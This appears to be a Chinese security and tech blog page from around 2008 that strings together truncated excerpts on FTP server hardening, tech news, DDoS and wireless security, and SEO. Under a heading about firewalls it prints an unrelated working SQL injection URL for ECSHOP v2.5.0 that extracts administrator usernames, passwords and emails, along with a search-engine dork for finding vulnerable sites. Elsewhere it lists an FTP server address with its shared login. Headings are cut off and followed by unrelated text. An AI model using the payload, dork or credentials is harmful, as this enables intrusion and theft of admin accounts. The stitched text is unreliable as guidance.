河北网络安全博客

        一、操作系统的选择

　　FTP服务器首先是基于操作系统而运作的，因而操作系统本身的安全性就决定了FTP服务器安全性的级别。虽然Windows 98/Me一样可以架设FTP服务器，但由于其本身的安全性就不强，易受攻击，因而最好不要采用。Windows NT就像鸡肋，不用也罢。最好采用Windows 2000及以上版本，并记住及时打上补丁。至于Unix、Linux，则不在讨论之列。

　　二、使用防火墙

ECSHOP v2.5.0存在注入点，可直接爆出后台管理员ID,PASSWORD,EMAIL
利用代码

user.php?act=order_query&order_sn=' union
select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*  
google搜索 "Powered by ECShop v2.5.0"
...

        为积极引导浙江人的创业热情，充分发挥网络经济在浙江经济中的突出作用，同时缓解社会就业压力，浙江省工商局今天出台了《关于大力推进网上市场快速健康发展的若干意见》，从推进多种模式网上市场发展、加大对网上市场的扶持力度和完善网上市场自律规范等三个方面入手，确保民营企业尤其是中小型企业的持续健康发展。

　　浙江省是个市场大省和民营经济大省，近年来，随着信息技术和经济的发展，网上交易异军突起，从嘉兴中国茧丝绸交易市场、余姚塑料城网上市场到阿里巴巴、网盛科技的迅速崛起，浙商在互联网领域也显现了惊人的创造力和骄人业绩，全国有一半以上的行业网站在浙江，位居全国第一。有数据显示，浙江省网上交易市场成交额从2004年的167亿，增加到2008年的920亿元，再加上淘宝网等综合网上交易平台的成交额，2008年浙江省的网上交易总额将达到 2000亿元。

来源：cnbeta  

        印象中,这是腾讯的第二次.前一次腾讯发飙的对象是陈寿福的珊瑚虫QQ.这一次,腾讯把目标指向了庞升东所领导的51.com——一家无论是消费受众还是业务类型都与腾讯高度重合的企业.腾讯与51.com的战争虽然在很多业内人士看来几乎不可避免,但是,以如今的这种形式开始,却是大大出乎意料之外.
　　彩虹之争

　　这的确是一个非常离奇的故事,甚至于有些荒诞.

        微软的Windows 7测试版的第一个提前预览版本正在开始流传。人们到目前为止了解到的情况是，Windows 7的外观和感觉很像Vista，不过是增加了一些小的功能和改善了用户界面。

　　在Windows Vista平台上工作的硬件和软件也能够在Windows 7上工作，这对于鼓励用户升级是非常重要的。Windows 7的安装时间不到半个小时，对于微软来说是很好的。
...

       12月29日消息，据网易网友透露，之前曾遭关闭的番茄花园网站已于近期重新开放。网易科技登陆原番茄花园网站（tomato***.com），发现该网站自动跳转到了谷歌首页。
　　此“番茄”非彼“番茄”

　　网友爆料中的“番茄花园”，网址为toma***.com和toma****.com，这两个网址类似的网站内容也几乎一模一样。

今天我们主要是给大家进行安全方面的讲座，黑客技术方面我们不会着重来讲，主要是让大家知道黑客的入侵手段，然后我们可以有效的去防御他们。

一、黑客的入侵手段？

现在黑客进行网站入侵的第一种技术就是注入攻击，包括服务器的一些较为流行的攻防技术。在讲解网站安全攻防技术之前，我想做个调查：现在大家在运营自己的网站的时候，遇到过黑客入侵过的站长请按1，没有请按2……哇，居然有这么多被黑客入侵过的朋友，那我想今天大家来对了。

现在黑客进行网站入侵的第一种技术就是注入攻击，这是一种很多网站普遍遇到的安全问题，很多网络程序员在编写网站程序的时候，都没有注意到对URL访问数据库作出限制，主要是编写动态操作数据库的ASP/ASP.NET/PHP/jsp(SUN企业级应用的首选)等语言。那我举一个简单的例子大家看看这个网站
...

        外部链接是一个基本的网站推广途径，一个好的反向链接不仅带来用户，更获得在搜索引擎的高质量权重。因此对SEOer来说，都在做增加外链的工作。结合自己的工作经验和一些筒子们的交流，总结盘点出了2008年增加外链的11种办法。

　　2008年增加外链的11种办法：

　　一、一个比较简单点就是利用网上收藏夹功能，现在好多大型站点都有网上收藏夹。比如yahoo收藏夹。qq书签，在google和baidu搜索网上收藏夹有n多，你都可以将自己的网站收藏起来。

         对于在线企业特别是电信运营商数据中心网络来说，分布式拒绝服务攻击(DDoS)的出现无疑是一场灾难，对于它的有效防护一直是网络应用中的一个难题。

　　一直以来DDoS是人们非常头疼的一个问题，它是一种很难用传统办法去防护的攻击手段，除了服务器外，带宽也是它的攻击目标。和交通堵塞一样，DDoS已经成为一种网络公害。

　　传统防护：有心无力

　　防止DDoS攻击，比较常用的有黑洞法、设置路由访问控制列表过滤和串联防火墙安全设备等几种

ftp://61.152.101.129

账号密码都是

72885388

       12月25日腾讯公司公告称，由于运营商网络线路故障，造成该公司12月24日部分服务无法正常使用。

　　据一些媒体报道，12月24日下午起，腾讯公司的IM、支付系统、网络游戏等一些服务无法正常使用。

　　腾讯公司表示，12月24日晚23：05，该公司所有服务都已经恢复正常。(完)

　　附：腾讯公司关于网络线路故障影响部分服务的通告

　　尊敬的腾讯用户：

　　12月24日19：43时左右，由于运营商网络线路故障的原因，腾讯公司部分服务的正常使用可能受到影响，目前相关服务已恢复。由此给用户带来的不便，腾讯公司深表歉意，敬请广大用户谅解。

        无线网络与有线网相信比，有更多的安全隐患。因为无线信号不受空间的限制，只需要在其覆盖的范围内，都可以比较轻松的连接上。因此，加强无线网络的安全是一件极为重要的事情。说起安全，每个人都会有自己的解决方法。而在无线网络中，笔者认为除做好常规的安全防范外，还应将网络中的电脑和路由隐藏起来，以避免被入侵者搜索到。

　　一、隐藏电脑

　　要让自己的电脑隐身，方法比较多，在这里我们向大家介绍一些常用的方法。

来源:赛迪网　作者:w.rui

近日，接到网友举报发现猫扑论坛被黑客挂马，而且已经超过两天时间尚未被猫扑论坛相关人员发现。
　　

       事件过程：

12月22日，在安全厂商举办的网络公益杀毒活动中，网友举报猫扑论坛被黑客挂马。点击该网页会自动下载数十种高危流行的木马病毒，通过盗取账号，给用户带来财产损失。

被挂马的网页链接为：http://bbs.news.mop.com/，该网页中包含的恶意代码
...

文章来源:   中国计算机安全日前，微软发布了IE紧急安全补丁，有报道称，该漏洞已经导致超过10000个站点被劫持，访问这些站点的用户都将被带往“毒窝”网站，大肆感染病毒。而如此高危的漏洞为何会被漏掉，微软负责安全代码开发的主管Michael Howard解释称，漏掉这一高危漏洞的原因是微软的开发人员没有接受正确的培训。　　在发布IE紧急安全补丁KB96

文章来源:   网易科技       腾讯公司旗下的多款产品于12月24日晚间出现异常状况。多名网友反映其通过QQ聊天无法收发消息，QQ空间无法登陆、Q币充值未到帐等。　　据悉，从下午5点起QQ手机服务就开始出现异常，一直持续到夜间10点左右才恢复，全国多个省市及海外用户均有投诉。　　短时间内，腾讯官方客服论坛出现数千

文章来源:   中国计算机安全中国网12月25日讯 据日本《读卖新闻》12月25日报道，日本靖国神社的官方网站12月24日遭不明黑客袭击。黑客将神社的主网页替换，上书“网页被黑客攻击”，并签下四人的化名。24日晚工作人员才发现这一异常，直到25日早仍未恢复。　　12月24日，靖国神社官方网站的主页被抹去，并写上英语“网页被小饭、海滩、里奇曼、

有车一族最烦的恐怕就是出车祸了，无锡彩民王先生撞车之后反而激发了编号灵感，他将对方的车牌和自己的车牌合在一起编成体彩7位数号码，没想到一下中了个500万。昨天上午，王先生带着朋友一同出现在江苏省体彩中心，前来领取这个撞车撞来的500万大奖。这起“幸运的”车祸还得追溯到一个多月前，当时王先生的车和另一辆车碰擦后，双方就等着交警前来处理。不过，王先生是个体彩迷，对数字十分敏感，

         色搜网站在前晚更换了网页，将“成人搜素”字样突出，搜索引擎关闭使用。稍后，网页也撤换下来，制作者在页面上留下“本站演示模仿baidu因上头条新闻，目前停止本站经营!”但他们还在网上留下了程序购买联系QQ和手机号码，晚些时候，制作者又将“程序购

 　 牟长青：老K很早就邀请我来做个推广经验分享，一开始我也不知道该讲些什么。我自己整理了下思路，还是硬着头皮和大家做点分享。今天是即兴发挥，不像平时自己写文章，写完了还能慢慢修改。有什么语句不通顺和错别字的时候，大家多多包涵。早期我最擅长的是论坛推广，算是比较大众化的推广手段，适合各种类型的网站。但我做论坛推广已经是3年前的事情了，现在再拿出来讲，自己都觉得有点过时了。因为现在的发贴权